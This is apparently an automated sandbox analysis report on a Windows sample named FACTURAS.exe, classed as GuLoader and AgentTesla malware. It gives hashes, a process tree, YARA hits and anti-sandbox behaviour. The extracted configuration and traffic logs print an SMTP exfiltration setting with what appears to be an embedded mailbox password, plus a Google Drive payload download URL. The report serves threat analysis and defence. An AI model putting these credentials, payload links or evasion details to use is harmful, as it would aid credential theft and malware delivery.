Play interactive tour

Edit tour

Windows Analysis Report FACTURAS.exe

Overview

General Information

Sample Name:	FACTURAS.exe
Analysis ID:	539521
MD5:	2332fdde9344114749db5496eef5f5f9
SHA1:	303c40dd112294dc012836be48eb38e8af056432
SHA256:	0e693b9dcb4ccb3e64cb61396447dd4e3871234b4af80c2d57e4fbc9b6268a61
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

Hides threads from debuggers

Writes to foreign memory regions

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

C2 URLs / IPs found in malware configuration

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64native

FACTURAS.exe (PID: 6316 cmdline: "C:\Users\user\Desktop\FACTURAS.exe" MD5: 2332FDDE9344114749DB5496EEF5F5F9)

CasPol.exe (PID: 5172 cmdline: "C:\Users\user\Desktop\FACTURAS.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

CasPol.exe (PID: 5196 cmdline: "C:\Users\user\Desktop\FACTURAS.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "gulnaz@furteksdokuma.com.tr@Gulnaz159753mail.furteksdokuma.com.trsarahmorg434@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downlD'"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000006.00000000.21615424247.0000000000E10000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CasPol.exe PID: 5196	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 5196	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000006.00000000.21615424247.0000000000E10000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downlD'"}
Source: CasPol.exe.5172.5.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gulnaz@furteksdokuma.com.tr@Gulnaz159753mail.furteksdokuma.com.trsarahmorg434@gmail.com"}

Multi AV Scanner detection for submitted file

Show sources

Source: FACTURAS.exe	Virustotal: Detection: 40%	Perma Link
Source: FACTURAS.exe	Metadefender: Detection: 38%	Perma Link
Source: FACTURAS.exe	ReversingLabs: Detection: 57%

Source: FACTURAS.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49804 version: TLS 1.2

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=downlD'

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/09s7mqju06nhfef03e9jkahgn04c8qp1/1639485750000/01707528263340534167/*/1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-7s-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 00000006.00000003.21845391885.0000000000FEC000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22637414137.0000000000FE2000.00000004.00000020.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 00000006.00000003.21845391885.0000000000FEC000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22637414137.0000000000FE2000.00000004.00000020.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp	String found in binary or memory: http://kFWRbv.com
Source: CasPol.exe, 00000006.00000003.21840136475.0000000000FDF000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: CasPol.exe, 00000006.00000003.21840136475.0000000000FDF000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0g-7s-docs.googleusercontent.com/
Source: CasPol.exe, 00000006.00000003.21845391885.0000000000FEC000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0g-7s-docs.googleusercontent.com/1
Source: CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0g-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/09s7mqju
Source: CasPol.exe, 00000006.00000003.21845391885.0000000000FEC000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0g-7s-docs.googleusercontent.com/e
Source: CasPol.exe, 00000006.00000003.21845391885.0000000000FEC000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0g-7s-docs.googleusercontent.com/u
Source: CasPol.exe, 00000006.00000002.22636737249.0000000000F58000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 00000006.00000002.22636737249.0000000000F58000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/st
Source: CasPol.exe, 00000006.00000002.22637930252.0000000001150000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T
Source: CasPol.exe, 00000006.00000002.22636994763.0000000000F95000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T.
Source: CasPol.exe, 00000006.00000003.21840176556.0000000000FE6000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9TmPHLwNfjxpm9j9STo
Source: CasPol.exe, 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/09s7mqju06nhfef03e9jkahgn04c8qp1/1639485750000/01707528263340534167/*/1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-7s-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49804 version: TLS 1.2

Source: FACTURAS.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_00B21130	6_2_00B21130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_00B24320	6_2_00B24320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_00B23A50	6_2_00B23A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_00B23708	6_2_00B23708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_1DED5E08	6_2_1DED5E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_1DED46C4	6_2_1DED46C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_1DED6AF1	6_2_1DED6AF1

Source: FACTURAS.exe, 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSERVICEKONTRAKTS.exe vs FACTURAS.exe
Source: FACTURAS.exe, 00000001.00000002.21868523702.0000000002AC0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSERVICEKONTRAKTS.exeFE2XMURAL@ vs FACTURAS.exe
Source: FACTURAS.exe	Binary or memory string: OriginalFilenameSERVICEKONTRAKTS.exe vs FACTURAS.exe

Source: C:\Users\user\Desktop\FACTURAS.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: FACTURAS.exe	Virustotal: Detection: 40%
Source: FACTURAS.exe	Metadefender: Detection: 38%
Source: FACTURAS.exe	ReversingLabs: Detection: 57%

Source: FACTURAS.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\FACTURAS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FACTURAS.exe "C:\Users\user\Desktop\FACTURAS.exe"
Source: C:\Users\user\Desktop\FACTURAS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
Source: C:\Users\user\Desktop\FACTURAS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FACTURAS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\FACTURAS.exe

File created: C:\Users\user\AppData\Roaming\Bh2BSU9xxO49MYboEPptixGKslvKjoQApxmsXHE151

Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe

File created: C:\Users\user\AppData\Local\Temp\~DF503944F8FF7253A1.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/2@2/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_03

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000006.00000000.21615424247.0000000000E10000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_0040508B pushad ; ret	1_2_0040509D
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_0040755C push cs; retf	1_2_0040755D
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_00407179 push esp; iretd	1_2_00407181
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_00407584 push cs; retf	1_2_0040755D
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_004085B8 push edx; retf	1_2_004085B9
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_00406245 push ecx; retf	1_2_00406249
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_004072E6 push ebp; iretd	1_2_004072E9
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_004042FC push edx; retf	1_2_004042FD
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_0040972A push eax; iretd	1_2_00409745
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_004083D6 pushfd ; iretd	1_2_00408422
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 1_2_023247D6 push 00000063h; iretd	1_2_023247E4

Source: C:\Users\user\Desktop\FACTURAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\FACTURAS.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: FACTURAS.exe, 00000001.00000002.21869632814.0000000003170000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
Source: FACTURAS.exe, 00000001.00000002.21869632814.0000000003170000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22637930252.0000000001150000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: CasPol.exe, 00000006.00000002.22637930252.0000000001150000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1E3NVGX3LLHNN9ZF6RWTJDW6FKTCAIH9T

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5956

Thread sleep time: -2767011611056431s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window / User API: threadDelayed 9947

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe

System information queried: ModuleInformation

Jump to behavior

Source: FACTURAS.exe, 00000001.00000002.21869694639.0000000003239000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: CasPol.exe, 00000006.00000002.22636737249.0000000000F58000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWX
Source: FACTURAS.exe, 00000001.00000002.21869694639.0000000003239000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: FACTURAS.exe, 00000001.00000002.21869694639.0000000003239000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
